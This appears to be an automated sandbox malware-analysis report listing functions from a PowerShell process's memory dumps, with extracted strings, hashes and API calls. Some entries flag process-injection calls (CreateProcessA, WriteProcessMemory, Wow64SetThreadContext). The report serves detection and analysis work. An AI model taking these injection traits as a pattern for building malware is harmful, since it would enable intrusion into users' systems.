Instruction Fuzzy Hash: 6F22E131F002149FDB54CF68E85466ABFE2BF89311F14C46AE9099F291DB31ED45CBA1

Function 06FE2238 Relevance: 8.0, Strings: 6, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE24C1
$^q, xrefs: 06FE2492
4'^q, xrefs: 06FE26A4
|P, xrefs: 06FE2584
$^q, xrefs: 06FE24B3
4'^q, xrefs: 06FE2698

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$|P$$^q$$^q$$^q
API String ID: 0-3908943310
Opcode ID: c2810d847fb95e7ef5c9191637e16c0d089fae1d4f5283babf922cedbab325ea
Instruction ID: 9e7772968f345739b2c1debd05e637753d2c3305697faa673586dff626efedab
Opcode Fuzzy Hash: c2810d847fb95e7ef5c9191637e16c0d089fae1d4f5283babf922cedbab325ea
Instruction Fuzzy Hash: B1E15731F043148FDB548B68885166ABFEAAFD5311B14C4ABD906DF286EF31CE45C7A2

Function 068E094D Relevance: 6.7, Strings: 5, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pq^q, xrefs: 068E0987
4'^q, xrefs: 068E0D15
4'^q, xrefs: 068E0D8E
4'^q, xrefs: 068E0D9A
4'^q, xrefs: 068E0D09

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$Pq^q
API String ID: 0-653376292
Opcode ID: 7ea20d6ec68ea1cbe5aea348b6ed5c6619da3efebd6b121a836889732b4d2ece
Instruction ID: dd71b49764e6af5c9a00a924e00c902f1d414130f045c57e11ee509cbe9a7029
Opcode Fuzzy Hash: 7ea20d6ec68ea1cbe5aea348b6ed5c6619da3efebd6b121a836889732b4d2ece
Instruction Fuzzy Hash: F9226E34B002189FD764DB18C851BADBBF2EF89304F54C4A9D909AB395CB71ED868F91

Function 06FE2D78 Relevance: 6.5, Strings: 5, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06FE2E80
4'^q, xrefs: 06FE2E8C
$^q, xrefs: 06FE2E51
$^q, xrefs: 06FE2E13
$^q, xrefs: 06FE2E45

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 58382133ead1ca203370768db08006188882355c8590065a16aeacd8c3f26013
Instruction ID: 3f0d866bd1d3e8cf9b0d36f3d3154b48b3a9f51c143526303b628701932cf613
Opcode Fuzzy Hash: 58382133ead1ca203370768db08006188882355c8590065a16aeacd8c3f26013
Instruction Fuzzy Hash: D6913632F043558FDB558B7888146AABFF6AFC5311B1484BBC505CB291EF35CA4AC792

Function 068E4C71 Relevance: 6.4, Strings: 4, Instructions: 1357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 068E60D1
4'^q, xrefs: 068E60DD
4'^q, xrefs: 068E6054
4'^q, xrefs: 068E603E

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: a4a55d1d26d87bfababa43aa41bd19fd7c58d37b23ffa27a496f615bb2803132
Instruction ID: 0ad012dc0ef7e4a7600fb44570c35695805957d7aadc0484881ceefb37d36f99
Opcode Fuzzy Hash: a4a55d1d26d87bfababa43aa41bd19fd7c58d37b23ffa27a496f615bb2803132
Instruction Fuzzy Hash: E8D230B4A002149FDB54CB54C894BA9B7B2EF95304F50C1E9DA09AF391CB71EE86CF91

Function 0671C408 Relevance: 4.0, Strings: 3, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<\r, xrefs: 0671C70E
<\r, xrefs: 0671C6DE
3(, xrefs: 0671C6EB, 0671C6F0

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: <\r$<\r$3(
API String ID: 0-2243276901
Opcode ID: b448cc0a43d64b904e3e294decebfc8c1e46bc33a46b8039d5e1ef23a59fdb17
Instruction ID: cc143fc60dbbde794e24c4df4f348c16c60dac4431c826afe5c44886b0ab0e61
Opcode Fuzzy Hash: b448cc0a43d64b904e3e294decebfc8c1e46bc33a46b8039d5e1ef23a59fdb17
Instruction Fuzzy Hash: 69A1A071B41208DFCB55DFA8E855ABDBBF2EF88311F14846AE801AB350DA39DE41CB54

Function 06FE2D55 Relevance: 3.9, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06FE2E80
$^q, xrefs: 06FE2E45
$^q, xrefs: 06FE2E13

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 5df5f82c86184474db3ce86491824e0bfc01714ed8ad5b527266e0581de99e63
Instruction ID: 7341c3976e9a45eb4da8f9f1c5884b79ffb04f7753b0ab5c74215d63a050da5a
Opcode Fuzzy Hash: 5df5f82c86184474db3ce86491824e0bfc01714ed8ad5b527266e0581de99e63
Instruction Fuzzy Hash: F4312435E04715CFEBA58F75C540A667FFAAF41210B0980BAD404CB162FB74CB45CBA2

Function 06FE4970 Relevance: 3.9, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE49B1
$^q, xrefs: 06FE49A3
$^q, xrefs: 06FE4982

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: c26a20650390217a61b49ae012ab955ccc067b514f5a3ae0d61fcf3ff83946b0
Instruction ID: d109b9538039a8a44d003263a3b9ec059cd797e6ec45e76f6ff168ae1854d574
Opcode Fuzzy Hash: c26a20650390217a61b49ae012ab955ccc067b514f5a3ae0d61fcf3ff83946b0
Instruction Fuzzy Hash: 9D31E536B142198FE7549E59D844A2BFBE6EBC4621B24C43FD919CB249EE32D842C790

Function 06FE4850 Relevance: 3.8, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE489D
$^q, xrefs: 06FE485F
$^q, xrefs: 06FE4891

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 69f6769ad57e978ee1084aa51452c3ae9857eef054914b6db4ecbf4d2643a3cd
Instruction ID: e968692dc7b7fd0518107ddc47a340df9aa7b47d8c3b104fd2e659017661d5b2
Opcode Fuzzy Hash: 69f6769ad57e978ee1084aa51452c3ae9857eef054914b6db4ecbf4d2643a3cd
Instruction Fuzzy Hash: C5214B35B043049BEB64566A980073EBBD69FC4B15F60C82EE509EB3C4DD31DD45C3A1

Function 068E6E27 Relevance: 3.7, Strings: 2, Instructions: 1229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 068E60D1
4'^q, xrefs: 068E603E

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 95d5f913daae9ac81547fb78439fa7438c47161051530a2e2d697d3a1980ff4a
Instruction ID: f53a8cb4244967961b8f9795a66ac0ba6cf38feeb260d36b9421d07e5a5fc8dc
Opcode Fuzzy Hash: 95d5f913daae9ac81547fb78439fa7438c47161051530a2e2d697d3a1980ff4a
Instruction Fuzzy Hash: B9C230B4A002149FD754CB54C890BA9B7B2EF95304F54C1E9DA09AF391CB72ED86CF91

Function 0671EEC0 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 0671F055
(bq, xrefs: 0671EFC6

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 9d6576193aba6995142d8c338b6deebab90dca67e0232277aec9dcfab7341723
Instruction ID: 190910a0b80dad60c026a54f92f498b1125e88a0e6d63c6928cd144211012413
Opcode Fuzzy Hash: 9d6576193aba6995142d8c338b6deebab90dca67e0232277aec9dcfab7341723
Instruction Fuzzy Hash: DE51C034B006108FC7A9AF3CD85462E77A7AFC5311B20846ED9068F3A1CE39ED42CB91

Function 06FE482F Relevance: 2.6, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE485F
$^q, xrefs: 06FE4891

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 782167c941387ee1a05957b469d81e2efff420a5011f803bb0c5ff605a456385
Instruction ID: dbf1507640ab3876a3cf1fc9bfb4b7741ec7e2f2d26dfd56c8c7e4bc0a8c5412
Opcode Fuzzy Hash: 782167c941387ee1a05957b469d81e2efff420a5011f803bb0c5ff605a456385
Instruction Fuzzy Hash: 0B113A36F083845BE7615729981072A7FE29FC2614F98859EE544EF2D6DA34DA08C362

Function 06FE4954 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE49A3
$^q, xrefs: 06FE4982

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 9f0df14a82a7c48bb3672242e73abf2be4cc3f058da5d9e64f3f9fea208b55d7
Instruction ID: 7bef5bb78048f1d06aa585a952295ab55b36709fbf19e4a773a46e5ff608474a
Opcode Fuzzy Hash: 9f0df14a82a7c48bb3672242e73abf2be4cc3f058da5d9e64f3f9fea208b55d7
Instruction Fuzzy Hash: 32110831E08245DFD7528F14DA50A66BFF2EF8121071881AFD808EB25AD632C845CB61

Function 06FE6328 Relevance: 2.6, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06FE636D
tP^q, xrefs: 06FE63C3

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q
API String ID: 0-1785267070
Opcode ID: 0c0eaf8f403d9b68538699883cd55b5e83230389d08c133b91bca9b627321900
Instruction ID: 7c112324e6617310f02918b2bf44c98d7fec6486edddeb6b9fefe5ccc5858f70
Opcode Fuzzy Hash: 0c0eaf8f403d9b68538699883cd55b5e83230389d08c133b91bca9b627321900
Instruction Fuzzy Hash: 88119071E012189FDB64CF54C846B6ABFE2BBA4720F18C469E908AF345C772E805C7E1

Function 06FE7475 Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06FE73BA

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 76b01e1a43e362669cccd8b71be9d5813a9f94749440d107770a77084fab06e8
Instruction ID: 03a2b18e7f5c080ab9e3b5b9e87eff32e0fd0386aeb07fdce5324b2cb1944deb
Opcode Fuzzy Hash: 76b01e1a43e362669cccd8b71be9d5813a9f94749440d107770a77084fab06e8
Instruction Fuzzy Hash: 77122974E01204DFEB54DB98C591A6ABBB2FF98304F54C069E909AB355CB72EC46CB81

Function 06FE6E98 Relevance: 1.7, Strings: 1, Instructions: 463COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06FE73BA

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: fb8388624a01cf0d2929ed6a2137fe9beaf2c54cfc36f6378117ab1f3295b10f
Instruction ID: 721e19c11cc649875184958ae007d2ee38e0417f22b148c68765c6ed6492dd8d
Opcode Fuzzy Hash: fb8388624a01cf0d2929ed6a2137fe9beaf2c54cfc36f6378117ab1f3295b10f
Instruction Fuzzy Hash: BB122874E01204DFDB64DB98C584E6ABBB2FF99304F54C069E909AB355CB32EC46CB81

Function 06948B20 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06948CFA

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 174bc8f83000dabfbc1f14189f318755baa210a5d2ec6502bd5a4ef9869e8f86
Instruction ID: e6c7005ce80c58197868ca67ba84bbca1548f0687de8f5140907b4c347ffef18
Opcode Fuzzy Hash: 174bc8f83000dabfbc1f14189f318755baa210a5d2ec6502bd5a4ef9869e8f86
Instruction Fuzzy Hash: 8F814AB1D006498FDB50EFA9C981BDDBBF1BF48314F24852AE855A7644D7749881CF81

Function 06949B7A Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06949C10

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3835973e48ddfd5821d9ce4dc77976af7857402d900a2f13d75027cece00965c
Instruction ID: 4a4e9d5e118408bdc9dd458bb4f7ae97517faaa65e60faf21220313bbac7ebc1
Opcode Fuzzy Hash: 3835973e48ddfd5821d9ce4dc77976af7857402d900a2f13d75027cece00965c
Instruction Fuzzy Hash: 882148B59003499FCB10DFA9C885BDEBBF5FF88320F10842AE519A7240C7789954DBA4

Function 06949B80 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06949C10

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 66f21761d5b2640166c0a638d9fc3d2ed87e23d18ef8e738b5952c12e6c61a9e
Instruction ID: dbc456978ffd730c19eb93bf931c741e9334100a51842c8e0a955f7d12f086fb
Opcode Fuzzy Hash: 66f21761d5b2640166c0a638d9fc3d2ed87e23d18ef8e738b5952c12e6c61a9e
Instruction Fuzzy Hash: 322125B5D003499FCB10DFAAC885BDEBBF5FF48320F10842AE919A7240C7789954DBA4

Function 069492D8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 03fe70c803716f013661aec8cd47ac75d65c48b627dcd34d7320a8244e47c10f
Instruction ID: c867368131224324cf36f10098beca5015f6bb65f6c9aa04cad6248c25af1fe3
Opcode Fuzzy Hash: 03fe70c803716f013661aec8cd47ac75d65c48b627dcd34d7320a8244e47c10f
Instruction Fuzzy Hash: 8B2148B1D003098FDB14DFAAC885BEEBBF4EF48320F148429D519A7240CB78A945CFA4

Function 069492E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d1f02b0779e4dd687fbb872306b6d4719fd864b9779ac12cb52a61f362cd4d3f
Instruction ID: c831deb64dea1886bcb58d10095f147c7ff23066752f3f601134025766afa5b2
Opcode Fuzzy Hash: d1f02b0779e4dd687fbb872306b6d4719fd864b9779ac12cb52a61f362cd4d3f
Instruction Fuzzy Hash: 15213AB1D003098FDB14DFAAC485BEEBBF4EF48324F148429D419A7240CB789945CFA4

Function 069493A7 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 34c1d4bb1b582b91cc91b8f8eeea8ee7c7b1dc8accfc0da0893adaca98231d86
Instruction ID: ee77219a41884a489470ec9f27ca1d23bbbbe3f07f9e050c1c12cb876392a3d8
Opcode Fuzzy Hash: 34c1d4bb1b582b91cc91b8f8eeea8ee7c7b1dc8accfc0da0893adaca98231d86
Instruction Fuzzy Hash: F51121728013088FE754FB69C8097EFBBF9DF81324F54806AD159A7290CF386845CB61

Function 0671BD10 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

(bq, xrefs: 0671BD84

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 74a19f125d391315275cd286979630888b264448292b858a528218bf98fdaf2b
Instruction ID: 6d57dca3998ae7f20fc7c7cc9d0a7ac2cdccbfc1899792306b0538ed358c80f0
Opcode Fuzzy Hash: 74a19f125d391315275cd286979630888b264448292b858a528218bf98fdaf2b
Instruction Fuzzy Hash: 3651B335A006159FCB14CF6CC48496AFBB1FF89720F1585A6D6159B292C730F995CBD0

Function 068E8DB0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

(o^q, xrefs: 068E8E91

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 43ee731508e9503558d99bda4c6ad6e1b974d06c2f2571a4f9b6445ebdb3e30d
Instruction ID: 7b367e8c5d0117394821fbbe29ed43f1adc62dbe150cc7fb45b766a947623156
Opcode Fuzzy Hash: 43ee731508e9503558d99bda4c6ad6e1b974d06c2f2571a4f9b6445ebdb3e30d
Instruction Fuzzy Hash: 9E21D3B0E0060ADFEBA4CF58C849BAEB7B2FF42314F048466E614CB191C7B5D884CB91

Function 0671F7C0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 0671F7FA

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: c4a521a2adf56716146c8e5e974eb957c3f3efe2a384ff19bd2dbeccd28722ce
Instruction ID: f3927d8933d9d35a3331560130a2c1cbe0b367daf8f31968bf5abda0ccd5697f
Opcode Fuzzy Hash: c4a521a2adf56716146c8e5e974eb957c3f3efe2a384ff19bd2dbeccd28722ce
Instruction Fuzzy Hash: 6A218E307001959FCB51CF2EC840EAA7BE9AF8A210F154096FC14CF361DA39DC51DB60

Function 068E8960 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068E8A11

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: dcee0003277c20bf3d01b9782fa84d7cef4f4cb8ff44c304493dc6ca5490c8b0
Instruction ID: e74c872b657e422d9d621c32d5d9a462daf9ff31a811fd62b0a80e06032af990
Opcode Fuzzy Hash: dcee0003277c20bf3d01b9782fa84d7cef4f4cb8ff44c304493dc6ca5490c8b0
Instruction Fuzzy Hash: A31186B0E40208CFDBA4DF69C44477E77E5AF86754F1880AAD909EB291D731D941CBA3

Function 06714670 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

b, xrefs: 067146AD

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: 716221382cf914e9af3ee4b275ceefafb81ac37da4b1c19948fd0522fea66738
Instruction ID: ce0d3eee6978ee8879b5881d0161398afb8763417be1847688472adda4ee001c
Opcode Fuzzy Hash: 716221382cf914e9af3ee4b275ceefafb81ac37da4b1c19948fd0522fea66738
Instruction Fuzzy Hash: FEF0C4B0A4022ACFEBA0CF29C848BE9B7B1FB05306F0144E69119AA240CB745AC4DF52

Function 06FE29D4 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE29F8

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 7b5c313f45a5ac395f43a86757b3a84df253b5c70cff7e7304400c0007edf2d0
Instruction ID: 7f4cdf83ae6ad9fc310049a2df5f65d1126cbdf96a0fa3feec9fdd99dccdc77f
Opcode Fuzzy Hash: 7b5c313f45a5ac395f43a86757b3a84df253b5c70cff7e7304400c0007edf2d0
Instruction Fuzzy Hash: 5EE0DF32E493C28FE7770B60DA10644BF326B92A00B0E81DBC0409F1A3E534C9C5C381

Function 06717BEA Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06717C19

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3a716408c55d51830193eb047d8983651078a6fdf91d02d3e8d96bc012a92332
Instruction ID: a259ddf831865a06b0f4f187354eebae6e9438b58b6fb6259585cb9885676c51
Opcode Fuzzy Hash: 3a716408c55d51830193eb047d8983651078a6fdf91d02d3e8d96bc012a92332
Instruction Fuzzy Hash: 25F0FEB490015A8FCB64DF28C9947E9BBB1FB48310F1040E5D919A7754DF306E85DF51

Function 06FE8DFC Relevance: .7, Instructions: 740COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1b9323b793e8342e317eefc718d796c957db120c8aa25d393d87f267e0db61
Instruction ID: d6d481966115a240d3a0ce9940e822d9902bcf07cc4d91a92c279215e63b9a8e
Opcode Fuzzy Hash: af1b9323b793e8342e317eefc718d796c957db120c8aa25d393d87f267e0db61
Instruction Fuzzy Hash: 7C622934F00214CFE754CB58C881BA9BBB2AF89314F55C099D919AB356CB72ED86CF91

Function 06FE8E20 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50298f604372ff6cd71b15a196a422b696beef9f67d6c334f0f550d9a5c51e9
Instruction ID: 4e8f8f7bf9f39b85ec49627795af80acd8770efd27c7ea005de60a0291ae4059
Opcode Fuzzy Hash: d50298f604372ff6cd71b15a196a422b696beef9f67d6c334f0f550d9a5c51e9
Instruction Fuzzy Hash: 95621834F00214CFEB54CB58C981B69BBB2AF89304F55C099D919AB356CB72ED86CF91

Function 06FE9953 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4742510d070e2e182c8708e29c1f3a33b65fbe554e0ee26d3ea88bea0ff1e7
Instruction ID: ac87531c2af699a2423ef16eaa91658e80488fe01d00af1b74daa4fcd54bcb6c
Opcode Fuzzy Hash: 0f4742510d070e2e182c8708e29c1f3a33b65fbe554e0ee26d3ea88bea0ff1e7
Instruction Fuzzy Hash: 00421834B00214CFE754CB58C891F69BBB2AF89304F55C099D919AB356CB72ED86CFA1

Function 040A86E3 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa07d3568ad08c5e14be9b735e677529f6dffc32e5167626af6ae62534f18d9
Instruction ID: 949f58bde5f927a7cb921bcc92d111f446259ec2aecf43fb7aa2843da7c77582
Opcode Fuzzy Hash: 7aa07d3568ad08c5e14be9b735e677529f6dffc32e5167626af6ae62534f18d9
Instruction Fuzzy Hash: A6E18D35A00208DFDB14EFA4D994BADBBF2EF84314F14C469E405AB395DB35AC56CB81

